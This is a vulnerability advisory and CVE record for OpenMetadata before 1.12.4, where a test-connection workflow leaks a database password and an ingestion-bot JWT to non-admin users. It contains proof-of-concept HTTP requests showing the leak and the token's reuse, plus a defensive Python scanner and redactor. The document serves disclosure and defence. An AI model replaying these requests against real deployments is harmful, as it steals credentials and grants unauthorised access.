OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4.
OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users
Problem type
CWE-201: Insertion of Sensitive Information Into Sent Data
Affected products
open-metadata
< 1.12.4 - AFFECTED
References
GitHub Security Advisories
GHSA-9vmh-whc4-7phg
OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users
https://github.com/advisories/GHSA-9vmh-whc4-7phg
This is not applicable if an application is configuring the Secrets Store to store credentials. Please make sure to follow the best practices when deploying in production.
In OpenMetadata 1.12.1, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both:
- The cleartext database password in request.connection.config.password.
- The ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken.
The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs (for example, GET /api/v1/services/databaseServices/{id}?include=all) with bot-level privileges.
This looks different from GHSA-pqqf-7hxm-rj5r, because it affects the automations/workflows TEST_CONNECTION endpoint on OpenMetadata 1.12.1, not the ingestion pipelines endpoints.
Version / Product
- Product: OpenMetadata (open source, Apache 2.0)
- Version: 1.12.1
- GET /api/v1/system/version → {"version":"1.12.1","revision":"618a2dc2ec8f70ffcd0378ee14ce92cb4f98f0c5"}
- Deployment: OpenMetadata server with SSO via Azure AD (OAuth), Oracle database service, secrets in DB secrets manager (secretsManagerProvider: "db").
Preconditions
- Authenticated SSO user with access to the UI.
- User can open a Database Service and click “Test connection”.
- No server admin role, no shell/DB access.
PoC (short)
- Login as a regular SSO user.
- In the UI go to: Settings → Services → Database Services → utplrac_scan2_srvetel
- Open the connection tab and click “Test connection”. The browser sends:
POST /api/v1/automations/workflows HTTP/1.1
Host: catalogodatos-test.utpl.edu.ec
Authorization: Bearer
Content-Type: application/json

{
  "name": "test-connection-Oracle-XXXX",
  "workflowType": "TEST_CONNECTION",
  "request": {
    "connection": {
      "config": {
        "type": "Oracle",
        "scheme": "oracle+cx_oracle",
        "username": "qpro_gobierno_datos",
        "password": "********",
        "hostPort": "172.16.54.32:1521",
        ...
      }
    },
    "serviceType": "Database",
    "connectionType": "Oracle",
    "serviceName": "utplrac_scan2_srvetel"
  }
}
Note: in the request the password is masked as "********".
- The server responds with HTTP 201 and a body similar to:
{
  "id": "5acd06f0-0db6-43b9-b0e0-e1574479bba7",
  "workflowType": "TEST_CONNECTION",
  "request": {
    "connection": {
      "config": {
        "type": "Oracle",
        "scheme": "oracle+cx_oracle",
        "username": "qpro_gobierno_datos",
        "password": "",
        "hostPort": "172.16.54.32:1521",
        ...
      }
    },
    "serviceType": "Database",
    "connectionType": "Oracle",
    "serviceName": "utplrac_scan2_srvetel",
    "secretsManagerProvider": "db"
  },
  "openMetadataServerConnection": {
    "type": "OpenMetadata",
    "hostPort": "http://openmetadata-server:8585/api",
    "authProvider": "openmetadata",
    "securityConfig": {
      "jwtToken": "eyJraWQiOiJHYjM4OWEtOWY3Ni1nZGpzLWE5MmotMDI0MmJrOTQzNTYiLCJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJvcGVuLW1ldGFkYXRhLm9yZyIsInN1YiI6ImluZ2VzdGlvbi1ib3QiLCJyb2xlcyI6WyJJbmdlc3Rpb25Cb3RSb2xlIl0sImVtYWlsIjoiaW5nZXN0aW9uLWJvdEBvcGVuLW1ldGFkYXRhLm9yZyIsImlzQm90Ijp0cnVlLCJ0b2tlblR5cGUiOiJCT1QiLCJ1c2VybmFtZSI6ImluZ2VzdGlvbi1ib3QiLCJwcmVmZXJyZWRfdXNlcm5hbWUiOiJpbmdlc3Rpb24tYm90IiwiaWF0IjoxNzc0MDI2Nzg3LCJleHAiOjE3ODE4MDI3ODd9.DHLw4s..."
    },
    ...
  },
  "updatedBy": "",
  ...
}
Key points:
- request.connection.config.password now contains the real Oracle DB password in cleartext.
- openMetadataServerConnection.securityConfig.jwtToken contains a valid JWT for the ingestion-bot account (sub = "ingestion-bot", tokenType = "BOT").
- Reuse the leaked ingestion-bot JWT:
GET /api/v1/services/databaseServices/f0382c0b-149e-4ca5-8844-d636c3437b9d?include=all HTTP/1.1
Host: catalogodatos-test.utpl.edu.ec
Authorization: Bearer
Accept: application/json
The API returns the full database service including username and password, confirming bot-level access.
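The following is an added example, not code from the OpenMetadata project or from the advisory, written in Python to show the two checks a defender would want from this report: a scanner that walks a decoded workflow response body and reports every unmasked password or jwtToken value, classifying a JWT as a bot token from the tokenType and isBot claims visible in the token quoted above, and a redaction step that produces the masked body a non-admin caller should have received. The sample response body and the JWT inside it are constructed fixtures that only copy the field layout and claim names of the advisory's 201 response; the two extra key names in SENSITIVE_KEYS beyond password and jwtToken are assumptions.

```python
import base64
import json

# Keys whose values must never reach a non-admin caller in cleartext.
# "password" and "jwtToken" are the fields named in the advisory; the other
# two are assumed extras for similar secret-bearing keys.
SENSITIVE_KEYS = {"password", "jwtToken", "privateKey", "clientSecret"}
MASK = "********"


def _b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def jwt_claims(token: str) -> dict:
    """Payload claims of a compact JWS, read WITHOUT signature verification.
    Inspection only: it classifies a token found in a body, nothing more."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def looks_like_jwt(value) -> bool:
    """True when value parses as a three-part JWS whose header carries alg."""
    if not isinstance(value, str) or value.count(".") != 2:
        return False
    try:
        header = json.loads(_b64url_decode(value.split(".")[0]))
    except ValueError:  # bad base64, bad UTF-8 and bad JSON all subclass it
        return False
    return isinstance(header, dict) and "alg" in header


def is_bot_token(token: str) -> bool:
    """Bot tokens carry tokenType "BOT" / isBot true (both claims appear in
    the leaked ingestion-bot token quoted in the advisory)."""
    claims = jwt_claims(token)
    return claims.get("tokenType") == "BOT" or claims.get("isBot") is True


def find_leaks(obj, path=""):
    """Walk a decoded JSON body; return (json_path, kind) for each sensitive
    key whose value is neither empty nor already masked."""
    leaks = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            here = f"{path}.{key}" if path else key
            if key not in SENSITIVE_KEYS:
                leaks.extend(find_leaks(value, here))
            elif isinstance(value, str) and value and value != MASK:
                if looks_like_jwt(value):
                    kind = "bot-jwt" if is_bot_token(value) else "jwt"
                else:
                    kind = "cleartext-secret"
                leaks.append((here, kind))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            leaks.extend(find_leaks(value, f"{path}[{i}]"))
    return leaks


def redact(obj):
    """Deep copy with every sensitive key masked: what the endpoint should
    return to a non-admin caller."""
    if isinstance(obj, dict):
        return {k: MASK if k in SENSITIVE_KEYS else redact(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj


def make_sample_jwt(claims: dict) -> str:
    """Constructed fixture: an RS256-shaped JWT with a placeholder signature;
    it would not verify against any real key."""
    def seg(d):
        raw = json.dumps(d, separators=(",", ":")).encode()
        return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")
    hdr = seg({"alg": "RS256", "typ": "JWT"})
    return f"{hdr}.{seg(claims)}.placeholder-signature"


def sample_workflow_response() -> dict:
    """Constructed fixture with the field layout of the advisory's 201 body;
    every value is made up."""
    bot = {"sub": "ingestion-bot", "roles": ["IngestionBotRole"], "isBot": True,
           "tokenType": "BOT", "iat": 1700000000, "exp": 1707776000}
    return {
        "workflowType": "TEST_CONNECTION",
        "request": {"connection": {"config": {
            "type": "Oracle", "username": "svc_user",
            "password": "Example-Cleartext-Pw", "hostPort": "db.example:1521"}}},
        "openMetadataServerConnection": {
            "authProvider": "openmetadata",
            "securityConfig": {"jwtToken": make_sample_jwt(bot)}},
    }


if __name__ == "__main__":
    body = sample_workflow_response()
    for json_path, kind in find_leaks(body):
        print(f"LEAK {kind:16} at {json_path}")
    print(json.dumps(redact(body), indent=2))
```

Run stand-alone it reports the two leaks the advisory describes (the cleartext password under request.connection.config and a bot JWT under openMetadataServerConnection.securityConfig) and then prints the masked body. The same find_leaks walk can be pointed at captured API responses in a proxy or integration test to confirm that a patched deployment no longer returns either value.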
Impact / Severity
- Any user who can run “Test connection” on a database service can:
  - Recover the cleartext DB credentials.
  - Recover a long-lived ingestion-bot JWT.
  - Act as ingestion-bot against the OpenMetadata API and access/modify services and metadata.
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-46481
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-46481",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-06-08T18:24:35.488Z",
    "dateReserved": "2026-05-14T18:06:06.810Z",
    "datePublished": "2026-06-08T16:51:06.998Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-06-08T16:51:06.998Z"
      },
      "title": "OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users",
      "descriptions": [
        {
          "lang": "en",
          "value": "OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4."
        }
      ],
      "affected": [
        {
          "vendor": "open-metadata",
          "product": "OpenMetadata",
          "versions": [
            {
              "version": "< 1.12.4",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-201: Insertion of Sensitive Information Into Sent Data",
              "cweId": "CWE-201",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
          "name": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW",
            "baseScore": 8.3,
            "baseSeverity": "HIGH"
          }
        }
      ]
    },
    "adp": [
      {
        "providerMetadata": {
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP",
          "dateUpdated": "2026-06-08T18:24:35.488Z"
        },
        "title": "CISA ADP Vulnrichment",
        "references": [
          {
            "url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
            "tags": [
              "exploit"
            ]
          }
        ],
        "metrics": [
          {}
        ]
      }
    ]
  }
}